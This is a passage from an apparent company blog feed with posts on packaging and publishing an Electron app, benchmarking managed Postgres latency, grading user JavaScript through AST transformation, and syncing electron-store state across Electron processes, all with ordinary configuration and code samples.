&quot;default&quot;,        &quot;arch&quot;: [          &quot;arm64&quot;,          &quot;x64&quot;        ]      }    },    &quot;win&quot;: {      &quot;target&quot;: {        &quot;target&quot;: &quot;nsis&quot;,        &quot;arch&quot;: [          &quot;x64&quot;        ]      },      &quot;artifactName&quot;: &quot;${productName}-Setup-${version}.${ext}&quot;    },    &quot;linux&quot;: {      &quot;category&quot;: &quot;Utility&quot;,      &quot;target&quot;: [        {          &quot;target&quot;: 
&quot;rpm&quot;,          &quot;arch&quot;: [            &quot;x64&quot;          ]        },        {          &quot;target&quot;: &quot;deb&quot;,          &quot;arch&quot;: [            &quot;x64&quot;          ]        }      ],    }, }</code></pre><p>In the Webpack configuration, we specified <code>release/app</code> as the output directoryfor the compiled JS code. This directory needs to be specified in<code>electron-builder</code> so it knows where to find the compiled code during packaging.Use the <code>directories.app</code> field to specify this path, and we can also definewhere the packaged builds should be output using the <code>directories.output</code> field.</p><p>In addition to <code>directories</code>, the configuration includes settings for <code>appId</code>,<code>productName</code> and platform-specific configurations for <code>mac</code>, <code>win</code>(Windows),and <code>linux</code>. For each platform, we specify the installer target andarchitecture. This configuration will produce builds for both Intel (<code>x64</code>) andApple Silicon (<code>arm64</code>) on <strong>macOS</strong>. For <strong>Windows</strong>, it generates an <code>NSIS</code>installer targeting 64-bit architecture (<code>x64</code>). 
On <strong>Linux</strong>, it produces both<code>RPM</code> and <code>DEB</code> installers for 64-bit architecture (<code>x64</code>).</p><p>With the <code>electron-builder</code> configuration set, we can proceed to package ourapplication using the <code>electron-builder build</code> command.</p><pre><code class="language-json">&quot;scripts&quot;: {    &quot;build:main&quot;: &quot;cross-env NODE_ENV=production webpack --config ./webpack/main.prod.mjs&quot;,    &quot;build:renderer&quot;: &quot;cross-env NODE_ENV=production webpack --config ./webpack/renderer.prod.mjs&quot;,    &quot;build&quot;: &quot;yarn build:main &amp;&amp; yarn build:renderer&quot;,    &quot;package&quot;: &quot;yarn build &amp;&amp; electron-builder build&quot;,}</code></pre><p>We run <code>yarn build</code> before <code>electron-builder build</code> to ensure that theJavaScript code is compiled before packaging. This enables us to handle both thebuild and packaging processes in a single command.</p><h3>Publish</h3><p>To publish the app to a server where users can download and use it, we can passthe <code>--publish</code> flag to <code>electron-builder build</code> command. Before we can do that,we need to update our <code>electron-builder</code> configuration with <code>publish</code> serverinformation.</p><p>Here is an example configuration to publish the builds to an S3 bucket named<code>my-app-downloads</code>:</p><pre><code class="language-json"> &quot;build&quot;: {  // other configs  &quot;publish&quot;: [      {        &quot;provider&quot;: &quot;s3&quot;,        &quot;bucket&quot;: &quot;my-app-downloads&quot;,        &quot;path&quot;: &quot;/electron/my-app/&quot;,        &quot;region&quot;: &quot;us-east-1&quot;,        &quot;acl&quot;: null      },    ] }</code></pre><p>The <code>publish</code> field accepts an array, allowing us to publish to multiplelocations. 
We need to specify a provider, such as <code>s3</code>, but <code>electron-builder</code>also supports other providers like <code>github</code> and more by default. For a completelist of all publishing options, check out the<a href="https://www.electron.build/configuration/publish">publish documentation</a>.</p><p>To wrap things up, let's automate the deployment process by creating a GitHubActions workflow. Since building macOS apps is only supported on macOS, we'llneed to run the workflow from a macOS environment.</p><pre><code class="language-yml">name: Publishjobs:  publish:    runs-on: ${{ matrix.os }}    strategy:      matrix:        os: [macos-latest]    steps:      - name: Setup Java        uses: actions/setup-java@v3        with:          distribution: &quot;adopt&quot;          java-version: &quot;11&quot;      - name: Checkout git repo        uses: actions/checkout@v3      - name: Install Node and NPM        uses: actions/setup-node@v3        with:          node-version: 20          cache: npm      - name: Install rpm using Homebrew        run: brew install rpm      - name: Install and build        run: |          yarn install          yarn build      - name: Publish releases        env:          AWS_ACCESS_KEY_ID: ${{secrets.AWS_ACCESS_KEY}}          AWS_SECRET_ACCESS_KEY: ${{secrets.AWS_SECRET}}        run: npm exec electron-builder -- --publish always -mwl</code></pre><p>To successfully build for Windows and Linux from macOS, we'll need to set up aJava version and install the <code>rpm</code> package. Additionally, configure our<code>AWS_ACCESS_KEY_ID</code> and <code>AWS_SECRET_ACCESS_KEY</code> for the S3 bucket where we planto upload the builds. 
Once these steps are complete, we should be able to build and publish our Electron app using the <code>electron-builder -- --publish</code> command. The <code>-mwl</code> flag indicates that the build should target macOS, Windows, and Linux.</p><h3>Auto-update</h3><p>To enable auto-updating for our application, we first need to code-sign and notarize it. We'll cover the code-signing and notarization details in upcoming blog posts. Stay tuned!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Benchmarking Crunchy Data for latency]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/crunchy-bridge-vs-digital-ocean"/>
      <updated>2024-10-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/crunchy-bridge-vs-digital-ocean</id>
      <content type="html"><![CDATA[<p>At Rails World 2024, DHH unveiled <a href="https://kamal-deploy.org/">Kamal 2</a> in his <a href="https://www.youtube.com/watch?v=-cEn_83zRFw">opening keynote</a>. Now folks want to give Kamal a try, but some people are worried about their data. They want to take one step at a time, and they feel more comfortable if their database is managed by someone else.</p><p>That's where <a href="https://www.crunchydata.com/">Crunchy Data</a> comes in. They provide a managed Postgres service. Check out this <a href="https://x.com/dhh/status/1840901376182009900">tweet</a> from DHH about Crunchy Data.</p><p>In our internal discussion, one of the BigBinary engineers brought up the issue of &quot;latency&quot;. Since the PostgreSQL server will not be in the same data center, what would the latency be? How much impact would it have on performance?</p><p>We didn't know the answer, so we thought we would do some benchmarking.</p><h2>Benchmarking</h2><p>To do the comparison, we needed another hosting provider where we can run PostgreSQL in the same data center. We chose to work with Digital Ocean.</p><p>To compare the two services, we wrote a benchmark script in Ruby similar to the one <a href="https://x.com/benbjohnson">Ben Johnson</a> wrote in <a href="https://github.com/benbjohnson/production-sqlite-go/blob/main/postgres-tests/postgres_test.go">Go</a> for his <a href="https://youtu.be/XcAYkriuQ1o?si=vz-sYjevztb_bnwL">GopherCon talk</a> in 2021.</p><p>In this benchmark, we're using Ruby's Benchmark module to measure the performance of a series of database operations. Here's what the code does:</p><ol><li><p>It establishes a connection to the database only once, at the beginning of the script. 
This is done outside the benchmarked operations because establishing connections can be slow due to TLS negotiation, and we don't want to include that time in our measurements.</p></li><li><p>It then performs the following operations 10,000 times, measuring each one:</p><ul><li>Drops a table named 't' if it exists.</li><li>Creates a new table 't' with two columns: 'id' (an auto-incrementing primary key) and 'name' (a text field).</li><li>Inserts a single row into the table with the name 'jane'.</li><li>Selects the 'name' from the table where the 'id' is 1 (which should be 'jane').</li></ul></li><li><p>After all 10,000 iterations, it calculates and prints the average time for each operation in microseconds.</p></li></ol><pre><code class="language-ruby">require &quot;pg&quot;
require &quot;benchmark&quot;

class PostgresBenchmark
  def initialize(connection_string)
    @conn = PG.connect(connection_string)
  end

  def run(iterations = 10_000)
    total_times = Hash.new { |h, k| h[k] = 0 }

    iterations.times do |i|
      puts &quot;Running iteration #{i + 1}&quot; if (i + 1) % 1000 == 0
      times = benchmark_operations
      times.each { |key, time| total_times[key] += time }
    end

    average_times = total_times.transform_values { |time| time / iterations }
    print_results(average_times, iterations)
  ensure
    @conn.close if @conn
  end

  private

  def benchmark_operations
    times = {}
    times[:drop] = Benchmark.measure { @conn.exec(&quot;DROP TABLE IF EXISTS t&quot;) }.real
    times[:create] = Benchmark.measure { @conn.exec(&quot;CREATE TABLE t (id SERIAL PRIMARY KEY, name TEXT)&quot;) }.real
    times[:insert] = Benchmark.measure { @conn.exec(&quot;INSERT INTO t (name) VALUES ('jane')&quot;) }.real
    times[:select] = Benchmark.measure do
      result = @conn.exec(&quot;SELECT name FROM t WHERE id = 1&quot;)
      raise &quot;Unexpected result&quot; unless result[0][&quot;name&quot;] == &quot;jane&quot;
    end.real
    times
  end

  def print_results(times, iterations)
    total_time = times.values.sum

    puts &quot;\nAVERAGE ELAPSED TIME (over #{iterations} iterations)&quot;
    puts &quot;drop    #{(times[:drop] * 1_000_000).round(2)} microseconds&quot;
    puts &quot;create  #{(times[:create] * 1_000_000).round(2)} microseconds&quot;
    puts &quot;insert  #{(times[:insert] * 1_000_000).round(2)} microseconds&quot;
    puts &quot;select  #{(times[:select] * 1_000_000).round(2)} microseconds&quot;
    puts &quot;TOTAL   #{(total_time * 1_000_000).round(2)} microseconds&quot;
  end
end

if __FILE__ == $0
  connection_string = &quot;&lt;DB_CONNECTION_STRING&gt;&quot;
  benchmark = PostgresBenchmark.new(connection_string)
  benchmark.run(10_000)
end</code></pre><h2>Database Specifications and Setup</h2><h3>Digital Ocean</h3><ul><li>Region: NYC3 data center</li><li>Specs: 2 vCPU, 4GB Memory</li><li>Price: $60 per month</li></ul><h3>Crunchy Data</h3><ul><li>Provider: AWS</li><li>Region: us-east-1</li><li>Specs: 2 vCPU, 4GB Memory (hobby-4 plan)</li><li>Price: $70 per month</li></ul><p>We provisioned a Digital Ocean droplet in the NYC3 data center and invoked the benchmark script from that machine. The Digital Ocean database was also in the same NYC3 data center. For Crunchy Data, the availability zone selected was <code>us-east-1</code>, as it was the closest to NYC3.</p><h2>Benchmarking results</h2><h3>Digital Ocean</h3><pre><code class="language-js">AVERAGE ELAPSED TIME (over 10000 iterations)
drop    3448.07 microseconds
create  5048.39 microseconds
insert  891.81 microseconds
select  584.17 microseconds
TOTAL   9972.44 microseconds</code></pre><h3>Crunchy Data</h3><pre><code class="language-js">AVERAGE ELAPSED TIME (over 10000 iterations)
drop    10097.89 microseconds
create  16818.63 microseconds
insert  8416.35 microseconds
select  7211.42 microseconds
TOTAL   42544.29 microseconds</code></pre><h2>Benchmarking analysis</h2><p>The results of this benchmark do not come as a surprise.
Digital Ocean is performing significantly better than Crunchy Data. This performance difference can be primarily attributed to network latency.</p><p><em>Network latency</em> refers to the round-trip time (RTT) it takes for data to travel from its source to its destination and back again across a network. In the context of database operations, it's the time taken for a query to be sent from the client to the database server and for the response to return to the client.</p><p>In our benchmarking, the Digital Ocean database and the client machine invoking the script were both located in the same data center (NYC3), resulting in minimal network latency. On the other hand, the Crunchy Data database was hosted in AWS <code>us-east-1</code>, and it had to communicate across a greater physical distance, adding to latency.</p><p>To get a more accurate value for the network latency, we can compare the average time taken to run the <code>SELECT</code> operation. The <code>SELECT</code> operation in the script is a point query. <em>A point query refers to a type of query that retrieves one or several rows based on a unique key</em>.</p><p>In our script, it retrieves a single <code>name</code> value from the table <code>t</code> where the <code>id</code> is <code>1</code> (which is the primary key), and is very fast to execute. Thus, the time taken to execute the <code>SELECT</code> operation can give us an approximate value for the network latency.</p><pre><code>db_time = network_latency + query_execution_time</code></pre><p>For point queries, the <code>query_execution_time</code> is almost zero, so practically all the time taken is network latency.</p><pre><code>db_time ≈ network_latency</code></pre><p>If we look at the benchmarking results, we can see that for the &quot;select&quot; operation the time taken by Digital Ocean is &quot;584 microseconds&quot; and for Crunchy Data it is &quot;7211 microseconds&quot;.</p><p>The difference in network latency is <em>6627 microseconds</em>.
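The arithmetic behind this estimate can be reproduced in a few lines (a hypothetical helper for illustration, not part of the original benchmark script):

```javascript
// Approximate network latency as the difference between the two SELECT
// timings, since query execution time for a point query is near zero.
const selectMicros = { digitalOcean: 584.17, crunchyData: 7211.42 };

// Per-query latency penalty, in microseconds.
const delta = selectMicros.crunchyData - selectMicros.digitalOcean;

// Cost of N sequential queries on a page, in milliseconds.
const pageCostMs = (queries) => (delta * queries) / 1000;

console.log(delta.toFixed(2)); // per-query delta in microseconds
console.log(pageCostMs(10).toFixed(1)); // cost of 10 sequential queries, ~66 ms
```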
That is 6.6 milliseconds.</p><p>This value can add up over multiple queries and have a significant impact on the overall response time of your application. To put this into perspective, for a web application that makes 10 sequential database queries to render a page, this could add up to about <em>66 milliseconds</em> to the page load time. Now, this could be an acceptable limit if your page loads in 3 to 4 seconds. However, if you are trying to load your page in 200 milliseconds, then you need to watch out.</p><p>Ensuring that the database is always up and properly backed up is a non-trivial problem. Latency notwithstanding, Crunchy Data takes care of running the database. This gives us peace of mind and allows us to exit the cloud one step at a time.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Evaluating JavaScript code in the browser]]></title>
       <author><name>Sayooj Surendran</name></author>
      <link href="https://www.bigbinary.com/blog/evaluating-javascript-in-neeto-course"/>
      <updated>2024-10-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/evaluating-javascript-in-neeto-course</id>
      <content type="html"><![CDATA[<p><a href="https://www.neeto.com/neetocourse">NeetoCourse</a> allows anyone to buildinteractive courses where they can add code blocks and assessments. This allowsthe user to run their code, see the output and check if their solution iscorrect or not. Check out<a href="https://courses.bigbinaryacademy.com/learn-javascript/array/challenge-create-array/">Bigbinary Academy's JavaScript course</a>to see this in action.</p><p>Let's see how we evaluate JavaScript code and check if the output matches thecorresponding solution.</p><h2>Synchronous code</h2><p>For a simple synchronous code, the first thing we need to check is if everythinglogged by the user is the same as that of the solution code. What we do here isaggregate all the logs to an array and then compare that array with the arraygenerated by the solution code. This is done by transforming the code using an<a href="https://www.npmjs.com/package/abstract-syntax-tree">AST library</a></p><p>Take this<a href="https://courses.bigbinaryacademy.com/learn-javascript/variables/challenge-variables/">exercise</a>as an example.</p><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/code1.png" alt="code"></p><p>Now let's see the transformed code.</p><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/transformed1.png" alt="transformed"></p><p>Here <code>pushTologs</code> replaces the <code>console.log</code> function and <code>logsAggregator</code> is anarray that stores all the logs. We also replace <code>throw</code> statements with<code>pushToLogs</code> to evaluate exceptions.</p><p>We also perform serialization to make comparison easier. 
The transformed code is then run as an <a href="https://www.bigbinary.com/videos/learn-javascript/immediately-invoked-function-expression">IIFE</a> and the result is used for comparison.</p><p>We run the user-submitted code in an iframe so that any bug in the submitted code doesn't mess up the page.</p><h2>How code is transformed</h2><p>Let's see how this &quot;code transformation&quot; works. We mentioned the use of an <a href="https://www.npmjs.com/package/abstract-syntax-tree">AST library</a>. An AST (abstract syntax tree) is a tree representation of the code which helps the compiler understand the structure of the code. Let's use a tool called <a href="https://astexplorer.net/">AST Explorer</a> to see what the AST looks like for the code below.</p><pre><code class="language-js">const priceOfPencil = 5;
console.log(&quot;Price of 1 pencil:&quot;);
console.log(priceOfPencil);</code></pre><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/astexplorer-2.png" alt="astexplorer"></p><p>Here, <code>MemberExpression</code> is a node, and in that node we can use <code>object.name</code>. See the pink underline highlights.</p><p>Using <code>object.name</code> we can get to the value <code>console</code>. See the green arrow.</p><p>Similarly, using <code>property.name</code> we can get to <code>log</code>.</p><p>Now our goal is to walk the tree and replace all <code>console.log</code> statements with <code>pushToLogs</code> statements.
For walking and replacing the value, we will use the <code>replace</code> function provided by the library.</p><pre><code class="language-js">replace(tree, node =&gt; {
  const { callee } = node;

  // create the node that needs to be put in place of console.log
  const pushToLogsExpression = parse(&quot;pushToLogs()&quot;).body[0].expression;

  // check for the console.log node
  if (
    callee?.type === &quot;MemberExpression&quot; &amp;&amp;
    callee?.object?.name === &quot;console&quot; &amp;&amp;
    callee?.property?.name === &quot;log&quot;
  ) {
    pushToLogsExpression.arguments = node.arguments;
    node = pushToLogsExpression;
  }

  return node;
});</code></pre><p>Here we are creating a new node by parsing the string <code>&quot;pushToLogs()&quot;</code>. We then add the arguments of the <code>console.log</code> call to the <code>pushToLogs</code> node. When we return this new node, the code transformation is complete.</p><h2>Asynchronous code</h2><p>Evaluating async code is a bit tricky since we won't get the output of the code right away. What we do in this case is transform the code to make it synchronous. For evaluating the output, this is the information we need:</p><ol><li>Console logs</li><li>Exceptions</li><li>The order in which the code needs to be executed</li></ol><p>We will transform the code in such a way that this information is available to us. Let's see how the code is transformed in the following cases:</p><h3>setTimeout / setInterval</h3><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/code2.png" alt="code"></p><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/transformed2.png" alt="transformed"></p><p>In this case, the function that needs to be executed after the specified timeout is executed inline, and the delay value is just added to the <code>logsAggregator</code> for record keeping.
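A before/after sketch of this transformation (a hypothetical shape; the screenshots show the real transformed output, and the recorded message text here is invented for illustration):

```javascript
// Original, asynchronous user code:
//   setTimeout(() => { console.log("done"); }, 1000);
//
// Transformed, synchronous equivalent: the callback runs inline and the
// delay is recorded in logsAggregator instead of actually waiting.
const logsAggregator = [];
const pushToLogs = (...args) => logsAggregator.push(...args);

const inlineSetTimeout = (callback, delay) => {
  pushToLogs(`setTimeout with delay ${delay}`); // record keeping only
  callback(); // executed immediately, no real timer
};

inlineSetTimeout(() => {
  pushToLogs("done");
}, 1000);

console.log(logsAggregator); // ["setTimeout with delay 1000", "done"]
```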
There will be no delay in the evaluation.</p><p>We do the same for <code>setInterval</code>.</p><p>In both cases we evaluate the function &quot;inline&quot; and then compare the <code>console.log</code> outputs.</p><p>What if we want an exercise involving <code>clearTimeout</code>? We simply add <code>Timeout cleared</code> to the <code>logsAggregator</code>.</p><h3>Promises</h3><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/code3.png" alt="code"></p><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/transformed3.png" alt="transformed"></p><p>Without going too much into detail: to evaluate Promises, all we did was move the callbacks from the <code>then</code> method of the promise to the arguments of a function.</p><p>We handle <code>async/await</code> code in a similar style.</p><p>What happens in the case of promise chaining?</p><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/code5.png" alt="code"></p><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/transformed5.png" alt="transformed"></p><p>Here, if we detect that there is more than one <code>then</code> call, the body of the second <code>then</code> is passed as <code>resolveFn</code> to the function that the first <code>then</code> returns. This can go multiple levels deep based on the chaining.</p><p>In other words, we go back to adding &quot;callbacks&quot;.</p><p>This is how we evaluate JavaScript in NeetoCourse. We evaluate HTML, CSS and SQL similarly in the browser. We have also recently added the evaluation of HTML Canvas. Evaluation of HTML Canvas animations is on the roadmap. But those can be a story for another day.</p><p>Want to see code evaluation in action? Check out <a href="https://courses.bigbinaryacademy.com/learn-javascript/challenges-set-4/find-second-largest-value-in-array/">this question</a> from our JavaScript course.</p><p>Interested to know more about NeetoCourse?
Follow <a href="https://twitter.com/NeetoCourse">@NeetoCourse</a> to see what we're up to.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Creating a synchronized store between main and renderer process in Electron]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron"/>
      <updated>2024-10-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/sync-store-main-renderer-electron</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a loomalternative. The desktop application was built using Electron. In a series ofblogs, we capture how we built the desktop application and the challenges we raninto. This blog is part 1 of the blog series. You can also read<a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>,<a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>,<a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>,<a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>,<a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>,<a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a><a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a> and<a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>When building desktop applications with <a href="https://electronjs.org/">Electron</a>, oneof the key challenges developers often face is managing the shared state betweenthe <code>main</code> process and multiple <code>renderer</code> processes. While the <code>main</code> processhandles the core application logic, <code>renderer</code> processes are responsible for theuser interface. However, they often need access to the same data, like userpreferences, application state, or session information.</p><p>Electron does not natively provide a way to persist data, let alone give asynchronized state across these processes.</p><h3>electron-store to store data persistently</h3><p>Since Electron doesn't have a built-in way to persist data, We can use<a href="https://github.com/sindresorhus/electron-store">electron-store</a>, an npm packageto store data persistently. 
<code>electron-store</code> stores the data in a JSON file named <code>config.json</code> in <code>app.getPath('userData')</code>.</p><p>Even though we can configure <code>electron-store</code> to be made directly available in the <code>renderer</code> process, it is recommended not to do so. The best way is to expose it via <a href="https://www.electronjs.org/docs/latest/tutorial/tutorial-preload">Electron's preload script</a>.</p><p>Let's look at how we can expose <code>electron-store</code> to the renderer via a preload script.</p><pre><code class="language-js">// preload.js
import { contextBridge, ipcRenderer } from &quot;electron&quot;;

const electronHandler = {
  store: {
    get(key) {
      return ipcRenderer.sendSync(&quot;get-store&quot;, key);
    },
    set(property, val) {
      ipcRenderer.send(&quot;set-store&quot;, property, val);
    },
  },
  // ...other code
};

contextBridge.exposeInMainWorld(&quot;electron&quot;, electronHandler);</code></pre><p>Here, we exposed a <code>set</code> function that calls the <code>ipcRenderer.send</code> method, which just sends a message to the <code>main</code> process.
The <code>get</code> function calls the <code>ipcRenderer.sendSync</code> method, which will send a message to the <code>main</code> process while expecting a return value.</p><p>Now, let's add <code>ipcMain</code> events to handle these requests in the <code>main</code> process.</p><pre><code class="language-js">import Store from &quot;electron-store&quot;;

const store = new Store();

ipcMain.on(&quot;get-store&quot;, async (event, val) =&gt; {
  event.returnValue = store.get(val);
});

ipcMain.on(&quot;set-store&quot;, async (_, key, val) =&gt; {
  store.set(key, val);
});</code></pre><p>In the <code>main</code> process, we created an <code>electron-store</code> instance and added <code>get-store</code> and <code>set-store</code> event handlers to retrieve and set data from the store.</p><p>Now, we can read and write data from any <code>renderer</code> process without exposing the whole <code>electron-store</code> class to it.</p><pre><code class="language-js">window.electron.store.set(&quot;key&quot;, &quot;value&quot;);
window.electron.store.get(&quot;key&quot;);</code></pre><h2>Synchronization</h2><p>Since we have sorted out the storage issue, let's look into how we can synchronize data between the <code>main</code> process and all its <code>renderer</code> processes.</p><p>Before we start, let's create a simple utility function that can send a message to all active <code>renderer</code> processes or, in other words, browser windows (we will use the terms <code>renderer</code> process and browser window interchangeably).</p><pre><code class="language-js">export const sendToAll = (channel, msg) =&gt; {
  BrowserWindow.getAllWindows().forEach(browseWindow =&gt; {
    browseWindow.webContents.send(channel, msg);
  });
};</code></pre><p><code>BrowserWindow.getAllWindows()</code> returns all active browser windows, and <code>browseWindow.webContents.send</code> is the standard way of sending a message from <code>main</code> to a <code>renderer</code>
process.</p><h3>electron-store onDidChange</h3><p><code>electron-store</code> provides <code>onDidChange</code>, an event listener that fires when a given field in the store changes. This is the key feature we are going to use to build the synchronization.</p><pre><code class="language-js">store.onDidChange(&quot;key&quot;, newValue =&gt; {
  // TODO
});</code></pre><p>Not all data needs to be synchronized. So, instead of adding <code>onDidChange</code> to every field, let's expose an API for the <code>renderer</code> process so that it can decide which data it needs and subscribe to it.</p><pre><code class="language-js">import Store from &quot;electron-store&quot;;

const store = new Store();
const subscriptions = new Map();

ipcMain.on(&quot;get-store&quot;, async (event, val) =&gt; {
  event.returnValue = store.get(val);
});

ipcMain.on(&quot;set-store&quot;, async (_, key, val) =&gt; {
  store.set(key, val);
});

ipcMain.on(&quot;subscribe-store&quot;, async (event, key) =&gt; {
  const unsubscribeFn = store.onDidChange(key, newValue =&gt; {
    sendToAll(`onChange:${key}`, newValue);
  });

  subscriptions.set(key, unsubscribeFn);
});</code></pre><p>Here, we exposed another API called <code>subscribe-store</code>. When that API is called with a key, we listen to that field's <code>onDidChange</code> event. Then, when <code>onDidChange</code> triggers, we call the <code>sendToAll</code> function we created earlier, and all the <code>renderer</code> processes listening to these changes will be notified with the latest data.
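The main-process side of this flow can be mimicked without Electron, which makes the mechanics easier to see (an illustrative sketch only: `createFakeStore`, `windows`, and the local `sendToAll` below are stand-ins for `electron-store`, the browser windows, and the real broadcast helper):

```javascript
// A tiny in-memory stand-in for electron-store with onDidChange semantics.
const createFakeStore = () => {
  const data = new Map();
  const watchers = new Map(); // key -> Set of callbacks

  return {
    get: (key) => data.get(key),
    set(key, value) {
      data.set(key, value);
      (watchers.get(key) ?? []).forEach((cb) => cb(value));
    },
    // Returns an unsubscribe function, like electron-store's onDidChange.
    onDidChange(key, cb) {
      if (!watchers.has(key)) watchers.set(key, new Set());
      watchers.get(key).add(cb);
      return () => watchers.get(key).delete(cb);
    },
  };
};

// Stand-ins for the renderer processes ("browser windows").
const windows = [];
const sendToAll = (channel, msg) =>
  windows.forEach((win) => win.receive(channel, msg));

const fakeStore = createFakeStore();
const subscriptions = new Map();

// Equivalent of the "subscribe-store" ipcMain handler.
const subscribeStore = (key) => {
  const unsubscribeFn = fakeStore.onDidChange(key, (newValue) =>
    sendToAll(`onChange:${key}`, newValue)
  );
  subscriptions.set(key, unsubscribeFn);
};

// Demo: one "window" subscribes to the user field, then the field changes.
const received = [];
windows.push({ receive: (channel, msg) => received.push([channel, msg]) });
subscribeStore("user");
fakeStore.set("user", { firstName: "Oliver" });
console.log(received); // one broadcast: ["onChange:user", { firstName: "Oliver" }]
```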
For example, if a field called <code>user</code> is subscribed to, we send a message to all <code>renderer</code> processes with the new value on a channel called <code>onChange:user</code>. We will soon add code in the <code>renderer</code> process to handle this.</p><p><code>store.onDidChange</code> returns the <code>unsubscribe</code> function for that particular key. Since we won't be unsubscribing straight away, we need to store this function for later use. Here, we are storing it in a hash map against the same key.</p><p>Let's add an option to unsubscribe as well.</p><pre><code class="language-js">//... other code

ipcMain.on(&quot;unsubscribe-store&quot;, async (event, key) =&gt; {
  subscriptions.get(key)();
});</code></pre><h3>Update preload script</h3><p>Let's update the preload script to support subscribing to and unsubscribing from the store.</p><pre><code class="language-js">// preload.js
import { contextBridge, ipcRenderer } from &quot;electron&quot;;

const electronHandler = {
  store: {
    get(key) {
      return ipcRenderer.sendSync(&quot;get-store&quot;, key);
    },
    set(property, val) {
      ipcRenderer.send(&quot;set-store&quot;, property, val);
    },
    subscribe(key, func) {
      ipcRenderer.send(&quot;subscribe-store&quot;, key);

      const subscription = (_event, ...args) =&gt; func(...args);
      const channelName = `onChange:${key}`;
      ipcRenderer.on(channelName, subscription);

      return () =&gt; {
        ipcRenderer.removeListener(channelName, subscription);
      };
    },
    unsubscribe(key) {
      ipcRenderer.send(&quot;unsubscribe-store&quot;, key);
    },
  },
  // ...other code
};

contextBridge.exposeInMainWorld(&quot;electron&quot;, electronHandler);</code></pre><p>We add two APIs here, <code>subscribe</code> and <code>unsubscribe</code>. While <code>unsubscribe</code> is straightforward, <code>subscribe</code> might need some explanation.
It exposes twoarguments, a store key and a callback function, to be called when there is achange to that field.</p><p>First, we call <code>subscribe-store</code> to subscribe to change to that data field;then, we listen to <code>ipcRenderer.on</code> for any changes. For example, when there isa change to the <code>user</code> field, <code>sendToAll</code> will propagate the change, and here weare listening to it on <code>onChange:user</code>.</p><p>Now, from a <code>renderer</code> process, if it needs to be notified of changes to the<code>user</code> field, we can subscribe to it like below.</p><pre><code class="language-js">window.electron.store.subscribe(&quot;user&quot;, newUser =&gt; {  // TODO});</code></pre><h3>useSyncExternalStore</h3><p>React provides a hook to connect to an external store called<code>useSyncExternalStore</code>. It expects two functions as arguments.</p><ul><li>The <code>subscribe</code> function should subscribe to the store and return anunsubscribe function.</li><li>The <code>getSnapshot</code> function should read a snapshot of the data from the store.</li></ul><p>In the <code>renderer</code> process, create a <code>SyncedStore</code> class with <code>subscribe</code> and<code>getSnapshot</code> functions that <code>useSyncExternalStore</code> expects.</p><pre><code class="language-js">class SyncedStore {  snapshot;  defaultValue;  storageKey;  constructor(defaultValue = &quot;&quot;, storageKey) {    this.defaultValue = defaultValue;    this.snapshot = window.electron.store.get(storageKey) ?? 
defaultValue;    this.storageKey = storageKey;  }  getSnapshot = () =&gt; this.snapshot;  subscribe = callback =&gt; {    // TODO  };}</code></pre><p>Here, we created a generic class that takes a <code>defaultValue</code> and <code>storageKey</code>.While creating the object, we loaded the existing data for that field from the<code>main</code> store.</p><p>When React tries to subscribe to this using <code>useSyncExternalStore</code>, we need tocall our <code>main</code> store's subscribe.</p><pre><code class="language-js">class SyncedStore {  snapshot;  defaultValue;  storageKey;  constructor(defaultValue = &quot;&quot;, storageKey) {    this.defaultValue = defaultValue;    this.snapshot = window.electron.store.get(storageKey) ?? defaultValue;    this.storageKey = storageKey;  }  getSnapshot = () =&gt; this.snapshot;  subscribe = callback =&gt; {    window.electron.store.subscribe(this.storageKey, callback);    return () =&gt; {      window.electron.store.unsubscribe(this.storageKey);    };  };}</code></pre><p>We have our <code>SyncedStore</code> ready, but it's a bit inefficient; for example, if weare subscribed to the same <code>storageKey</code> in multiple places, it will create asubscription for each instance in the main store. That is needless IPCcommunications for the same data.</p><p>Let's improve this a bit so that only one subscription is registered per browserwindow(<code>renderer</code> process), and if there are multiple use cases of the same,let's handle it internally.</p><pre><code class="language-js">class SyncedStore {  snapshot;  defaultValue;  storageKey;  listeners = new Set();  constructor(defaultValue = &quot;&quot;, storageKey) {    this.defaultValue = defaultValue;    this.snapshot = window.electron.store.get(storageKey) ?? 
